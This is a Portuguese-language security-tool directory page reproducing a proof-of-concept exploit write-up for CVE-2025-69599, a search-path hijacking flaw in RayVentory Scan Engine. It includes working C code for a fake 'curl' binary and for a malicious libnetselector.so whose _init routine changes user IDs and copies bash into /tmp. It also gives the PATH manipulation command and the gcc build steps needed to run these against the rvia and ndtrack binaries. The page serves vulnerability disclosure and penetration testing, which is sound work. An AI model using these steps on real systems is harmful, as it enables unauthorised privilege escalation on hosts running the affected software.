Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-69599 — Exploit de prova de conceito para CVE-2025-69599 demonstrando elemento de caminho de busca não controlado no RayVentory Scan Engine via PATH hijacking e shared object injection para escalada de privilégio. | Kitploit
Ferramentas/GitHubGitHub/wise-security/cve-2025-69599
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoAnálise de BináriosSegurança da Cadeia de Suprimentos
GitHubwise-security/cve-2025-69599

CVE-2025-69599

Exploit de prova de conceito para CVE-2025-69599 demonstrando elemento de caminho de busca não controlado no RayVentory Scan Engine via PATH hijacking e shared object injection para escalada de privilégio.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
há 4 mesesAinda não revisado

CVE-2025-69599

  • autor: Rafael José Núñez Gulías
  • empresa: Iberian Var Group
  • Produtos afetados: RayVentory Scan Engine 12.6 Update 8 e versões anteriores
  • Aviso da Raynet: RSEC200965

O rvia na Raynet é vulnerável a um problema de Elemento de Caminho de Pesquisa Não Controlado. Ao carregar objetos compartilhados e chamar binários do sistema (como .so e binários auxiliares), eles são chamados usando caminhos relativos, o que permite que um usuário adultere o binário final ou o objeto .so executado por meio da manipulação da variável de ambiente PATH.

20251117223200.png

Na evidência a seguir, um binário arbitrário chamado curl é criado no diretório /tmp.

root@kitploit:~
#include <stdio.h>
#include <stdlib.h>

int main() {
	system("whoami");
	return 0;
}
root@kitploit:~
gcc curl.c -o curl # Compilando o binário

A variável PATH é alterada para que o primeiro diretório a ser pesquisado pelo comando curl quando chamado pelo rvia seja /tmp.

root@kitploit:~
export PATH=/tmp:$PATH

E depois disso, uma chamada a /opt/rvia/rvia getconfig usará nosso binário curl adulterado.

20251209121335.png

O mesmo se aplica à opção upload.

20251209121709.png

O mesmo problema é encontrado ao usar a opção rvia inventory, que internamente chama o binário ndtrack. O binário ndtrack chama os comandos cat e sh usando um caminho relativo.

20251117223833.png

20251224134109.png

Por fim, também foi detectado que o binário ndtrack está incluindo objetos compartilhados .so files, usando caminhos relativos.

20251118093146.png

Na evidência a seguir, é possível ver as etapas realizadas para substituir a chamada relativa a libnetselector.so (também é possível realizar as mesmas ações com libuploader.so). Neste caso, um objeto compartilhado personalizado é criado; quando este objeto compartilhado é executado, uma cópia do bash no diretório /tmp como bash_so_hijack será criada.

A seguir está o código C para criar o objeto compartilhado personalizado chamado libnetselector.so.

root@kitploit:~
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/types.h>

void _init() {
	setuid(1001);
	setgid(1001);
	system("cp /bin/bash /tmp/bash_so_hijack");
}
root@kitploit:~
gcc -fPIC -shared -o libnetselector.so libnetselector.c -nostartfiles # compilando o objeto compartilhado

20251209131403.png

É importante notar que isso só funciona ao chamar ndtrack diretamente, pois quando a opção inventory é invocada, uma chamada a um script bash em /opt/rvia chamado ndtrack é feita, que define a variável de ambiente PATH antes de chamar o binário ndtrack.

20251223190146.png

Baixar ferramenta